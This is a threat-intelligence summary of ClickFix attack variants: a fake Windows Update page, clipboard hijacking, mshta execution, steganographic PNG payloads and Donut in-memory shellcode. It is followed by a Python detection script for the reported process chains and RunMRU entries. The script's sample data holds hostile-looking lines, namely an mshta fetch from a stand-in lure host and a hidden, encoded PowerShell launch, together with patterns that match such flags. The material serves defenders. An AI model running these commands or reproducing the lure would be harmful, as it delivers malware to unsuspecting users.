Full Report
New ClickFix attack variants have been observed where threat actors trick users with a realistic-looking Windows Update animation in a full-screen browser page and hide the malicious code inside images. [...]
Analysis Summary
# Tool/Technique: ClickFix Attack Variants (Fake Windows Update Lure)
## Overview
ClickFix is a persistent social-engineering attack that tricks users into pasting and executing malicious commands into the Windows Command Prompt. New variants utilize a highly deceptive lure involving a realistic, full-screen browser page mimicking a Windows Update animation to convince the victim to execute commands that ultimately deploy malware payloads.
## Technical Details
- Type: Attack Framework/Technique (Social Engineering/Delivery Mechanism)
- Platform: Windows
- Capabilities: Execution of arbitrary commands via user input (Copy/Paste), Payload delivery via steganography in images, In-memory execution of shellcode.
- First Seen: Variants observed since at least October 1st (the date applies to the specific variant described here).
## MITRE ATT&CK Mapping
- T1566 - Phishing
- T1566.001 - Spearphishing Attachment (Conceptual fit for the initial lure/delivery)
- T1204 - User Execution
- T1204.002 - Malicious File
- T1059 - Command and Scripting Interpreter
- T1059.003 - Windows Command Shell
- T1027 - Obfuscated Files or Information
- T1027.001 - Steganography (Used for hiding the final payload)
- T1055 - Process Injection
- T1055.012 - Windows Shellcode Injection (Implied by Donut usage)
## Functionality
### Core Capabilities
- **Deceptive Lure:** Presents a full-screen browser page mimicking a Windows Update installation process or a simple "human verification."
- **Clipboard Hijacking via JavaScript:** Uses JavaScript on the malicious webpage to automatically copy attack commands to the user's clipboard.
- **Forced Execution:** Instructs the user to manually paste and execute these commands in the Command Prompt, leading to the initial stages of deployment.
- **Multi-Stage Execution:** Begins execution using the native Windows binary `mshta.exe` to run malicious JavaScript.
### Advanced Features
- **Steganography Payload Hiding:** The final malware payload is encoded directly within the pixel data of PNG images, relying on specific color channels to reconstruct and decrypt the payload in memory.
- **Stego Loader:** A .NET assembly used to manage the decryption process. It contains an AES-encrypted blob which is the steganographic PNG file holding shellcode.
- **Dynamic Evasion (Ctrampoline):** The entry point function initiates a large chain of thousands of empty function calls (trampolining) to obfuscate the execution flow and evade behavioral analysis.
- **Memory Execution:** Utilizes the **Donut** tool to unpack and execute the extracted shellcode (which can include VBScript, JScript, EXE, DLL files, or .NET assemblies) directly in memory, avoiding traditional file-system detection.
## Indicators of Compromise
- File Hashes: N/A (Payload is memory-resident where possible, specific hashes not provided in the text)
- File Names: N/A (Focus on in-memory execution)
- Registry Keys: `RunMRU` (Monitor for suspicious commands entered via the Run box by users).
- Network Indicators: Domains associated with the fake Windows Update process are noted as still active but the specific C2 destinations for the deployed malware are not listed.
- Behavioral Indicators:
  - `explorer.exe` spawning `mshta.exe`.
  - PowerShell execution following the initial process chain.
  - High-entropy or otherwise suspicious memory regions indicative of unpacked shellcode (Donut artifact).
## Associated Threat Actors
- Threat actors utilizing the **LummaC2** and **Rhadamanthys** infostealers have been observed deploying this specific ClickFix variant. (Note: Rhadamanthys infrastructure was recently disrupted by law enforcement).
## Detection Methods
- Signature-based detection: Unlikely to succeed against in-memory, dynamically decrypted payloads, though YARA rules could be developed for the Stego Loader's internal AES-encrypted blob structure.
- Behavioral detection: Monitor for unusual process lineage, specifically `explorer.exe` spawning `mshta.exe` or PowerShell processes initiated through user interaction paths.
- YARA rules: Potential for rules targeting the specific structure of the Donut packed shellcode or the custom C# logic used in the Stego Loader.
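The behavioral indicators above (the `explorer.exe` to `mshta.exe` lineage, PowerShell following that chain, and commands left in `RunMRU`) can be turned into a small detection routine. The block below is an added example, not part of the original report or any vendor tooling: the process-creation events and the `RunMRU` values are constructed samples, the event field names (`image`, `parent_image`, `cmdline`) are an assumption standing in for whatever your EDR or Sysmon pipeline emits, and the `\1` suffix is the form in which Windows stores `RunMRU` entries.

```python
import re

# Constructed sample process-creation events (Sysmon-like shape; not real telemetry).
# Field names are an assumption for this example, not a vendor schema.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Windows\System32\winlogon.exe", "cmdline": "explorer.exe"},
    {"pid": 5204, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "mshta https://update-lure.example/verify.hta"},
    {"pid": 5310, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "powershell -w hidden -nop -ep bypass -enc AAAA"},
    {"pid": 6000, "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe"},
    {"pid": 6100, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Program Files\Vendor\installer.exe", "cmdline": "mshta setup.hta"},
]

# Constructed RunMRU values: MRUList orders the value names, most recent first;
# each entry carries the "\1" suffix Windows appends when storing it.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": r"notepad\1",
    "b": r"cmd\1",
    "c": r"mshta https://update-lure.example/verify.hta\1",
}

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Flags commonly paired with hidden, encoded PowerShell stages.
ENCODED_FLAGS = re.compile(r"-(enc|encodedcommand|e)\b|-w(indowstyle)?\s+hidden|-nop\b|-ep\s+bypass")
# Run-box commands that launch an interpreter directly, as ClickFix lures instruct the user to do.
RUNMRU_PATTERN = re.compile(r"^(mshta|powershell|pwsh|cmd\s*/c)\b", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return the list of reasons a single process-creation event looks like ClickFix."""
    child = basename(ev["image"])
    parent = basename(ev["parent_image"])
    cmd = ev["cmdline"].lower()
    reasons = []
    if parent == "explorer.exe" and child == "mshta.exe":
        reasons.append("explorer.exe spawned mshta.exe (ClickFix initial stage)")
    if parent == "mshta.exe" and child in SCRIPT_HOSTS:
        reasons.append(f"mshta.exe spawned {child} (follow-on stage)")
    if child in {"powershell.exe", "pwsh.exe"} and ENCODED_FLAGS.search(cmd):
        reasons.append("PowerShell launched with hidden/encoded flags")
    return reasons


def detect(events):
    """Map pid -> reasons for every event that triggers at least one rule."""
    return {ev["pid"]: r for ev in events if (r := score_event(ev))}


def suspicious_runmru(values):
    """Return (value name, command) pairs from RunMRU that launch an interpreter, most recent first."""
    hits = []
    for key in values.get("MRUList", ""):
        entry = values.get(key, "")
        if entry.endswith("\\1"):
            entry = entry[:-2]
        if RUNMRU_PATTERN.search(entry.strip()):
            hits.append((key, entry))
    return hits


if __name__ == "__main__":
    for pid, reasons in detect(SAMPLE_EVENTS).items():
        print(pid, "->", "; ".join(reasons))
    for key, cmd in suspicious_runmru(SAMPLE_RUNMRU):
        print("RunMRU", key, "->", cmd)
```

The `installer.exe` to `mshta.exe` event is deliberately left unflagged: the lineage rule keys on the interactive `explorer.exe` parent the report names, so a vendor installer that runs an HTA does not produce noise. Tune `SCRIPT_HOSTS` and the flag regex to your environment; the `RunMRU` check is a forensic pass over the registry hive rather than a real-time signal.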
## Mitigation Strategies
- **User Training:** Emphasize vigilance against unexpected prompts requiring the user to execute commands copied to the clipboard or to interact with browser-based 'security updates.'
- **Disable Windows Run Box:** Restricting the use of the standard Windows Run box (`Win+R`) limits an attacker's ability to exploit a user's inadvertent copy/paste of the attack command.
- **Monitoring:** Implement robust monitoring on suspicious process chains, such as `explorer.exe` spawning unexpected file interpreters (`mshta.exe`) or scripting engines (`powershell.exe`).
## Related Tools/Techniques
- LummaC2 (Malware deployed)
- Rhadamanthys (Malware deployed)
- Donut (Payload packing/loader tool)
- Steganography (Payload encoding technique)